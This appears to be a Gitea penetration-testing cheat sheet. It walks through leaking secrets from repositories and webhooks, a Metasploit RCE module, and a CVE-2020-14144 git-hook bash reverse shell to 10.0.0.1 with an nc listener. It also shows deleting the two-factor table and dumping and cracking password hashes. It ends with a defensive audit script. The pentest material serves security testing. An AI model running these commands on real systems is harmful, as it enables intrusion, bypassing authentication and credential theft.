Gitea Pentesting
Last modified: 2025-04-03
Gitea is a forge software package for hosting software development version control using Git.
Common Directories
/api/swagger
/api/v1/repos/search?q=test
/api/v1/users/search?q=test
/api/v1/users/<username>/repos
/explore/organizations
/explore/repos
/explore/users
# OAuth
/.well-known/openid-configuration
/login/oauth/authorize
/login/oauth/access_token
/login/oauth/userinfo
/login/oauth/keys
Investigation
Source Code in Repositories
If we can access repositories, we might be able to find sensitive information, e.g. credentials, subdomains, other domains, secret keys, etc.
So check the source code.
Go Back to Previous Commits
We can see the source code of previous commits and find sensitive information accidentally disclosed by committers.
Get Secrets in Web Hooks
In an existing repository, we may find the secret value under Settings → Web Hooks.
Find User Credentials
If we have access to the target system and a repository that was pushed to Gitea exists on it, we might be able to find credentials in its git configuration.
cd /path/to/gitea/repo
git config -l
Git Fetch Remote Code Execution (RCE)
Metasploit
msfconsole
msf> use exploit/multi/http/gitea_git_fetch_rce
msf> (set options)
msf> run
Git Hooks Remote Code Execution (RCE)
CVE-2020-14144
It affects Gitea versions from 1.1.0 to 1.13.
1. Login
Access the Gitea dashboard and log in with an existing account.
2. Create a New Repository
3. Go to the Repository’s Settings
In the new repository we’ve created, go to Settings → Git Hooks → post-receive.
4. Update to the Reverse Shell Payload
In the post-receive edit page, inject the payload as below:
#!/bin/bash
bash -i >& /dev/tcp/10.0.0.1/4444
5. Start Listener in Terminal
To receive the incoming connection from the git hook, start a listener.
nc -lvnp 4444
6. Create the New Repository in Terminal
mkdir test
cd test
touch README.md
git init
git add README.md
git commit -m "first commit"
git remote add origin https://<target-ip>/<username>/test.git
git push -u origin master
After pushing, the git hook is triggered and executes the reverse shell command.
Now we should get a shell.
Swagger API
We can access /api/swagger to interact with the Swagger API.
Get New Token & Authorize
We need a token to use the Swagger API.
- Register a new account on the Gitea top page.
- Go to /user/settings/applications and generate a new token.
- Copy the token value, e.g. “fa2c2428817d64c1b890d404a905f7be2ffd4bde”.
- Go to /api/swagger.
- Click the “Authorize” button. A modal window opens.
- Paste the token in the “Token” section.
Delete Two-Factor Authentication
victim@machine:/gitea/gitea$ python3
>>> import sqlite3
>>> conn=sqlite3.connect('gitea.db')
>>> conn.execute('delete from two_factor')
>>> conn.commit()
>>> conn.close()
Dump Credentials in Database
Reference: Cracking Gitea's PBKDF2 Password Hashes
Gitea stores user accounts in its database file, so we can find user hashes there.
# 1. Open it with `sqlite3`
sqlite3 /path/to/gitea/data/gitea.db
# 2. Retrieve credentials from the `user` table
sqlite> select email,salt,passwd,passwd_hash_algo from user;
Once the hashes are found, we can crack them using gitea2hashcat.
# Paste the hashes (salt|passwd only) of the result above
python3 gitea2hashcat.py '<salt>|<passwd>'
Copy the output and crack it with Hashcat:
# the `-m 10900` (PBKDF2-HMAC-SHA256) may change depending on the hash algorithm.
hashcat -m 10900 '<hash>' wordlist.txt
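As an added audit example (not from the original page or the Gitea project), the script below opens a Gitea SQLite database and reports which accounts still carry PBKDF2 password hashes (the kind crackable as shown above) and which have no two_factor row. The user and two_factor tables and the email/salt/passwd/passwd_hash_algo columns come from the page; the user.id and two_factor.uid columns and the sample rows are assumptions.

```python
import sqlite3


def audit_gitea_db(conn):
    """Return (pbkdf2_users, no_2fa_users) as sorted lists of emails.

    A user is flagged as PBKDF2 when passwd_hash_algo starts with "pbkdf2"
    (Gitea also writes parameterised forms such as "pbkdf2$50000$50").
    A user is flagged as lacking 2FA when no two_factor row references its id.
    """
    rows = conn.execute(
        "select u.id, u.email, u.passwd_hash_algo, "
        "(select count(*) from two_factor t where t.uid = u.id) as tf "
        "from user u"
    ).fetchall()
    pbkdf2_users = sorted(
        email for _, email, algo, _ in rows
        if (algo or "").lower().startswith("pbkdf2")
    )
    no_2fa_users = sorted(email for _, email, _, tf in rows if tf == 0)
    return pbkdf2_users, no_2fa_users


def build_demo_db():
    """Constructed in-memory sample, not data from a real Gitea instance."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        create table user (id integer primary key, email text, salt text,
                           passwd text, passwd_hash_algo text);
        create table two_factor (id integer primary key, uid integer, secret text);
        insert into user values (1, 'admin@example.com', 'aa', 'bb', 'pbkdf2');
        insert into user values (2, 'dev@example.com',   'cc', 'dd', 'argon2');
        insert into user values (3, 'ops@example.com',   'ee', 'ff', 'pbkdf2$50000$50');
        insert into two_factor values (1, 1, 'secret-admin');
        insert into two_factor values (2, 3, 'secret-ops');
    """)
    return conn


if __name__ == "__main__":
    # Replace build_demo_db() with sqlite3.connect('/path/to/gitea/data/gitea.db')
    # to audit a real instance (read-only copy recommended).
    weak, no_2fa = audit_gitea_db(build_demo_db())
    print("PBKDF2 password hashes:", weak)
    print("Accounts without 2FA:  ", no_2fa)
```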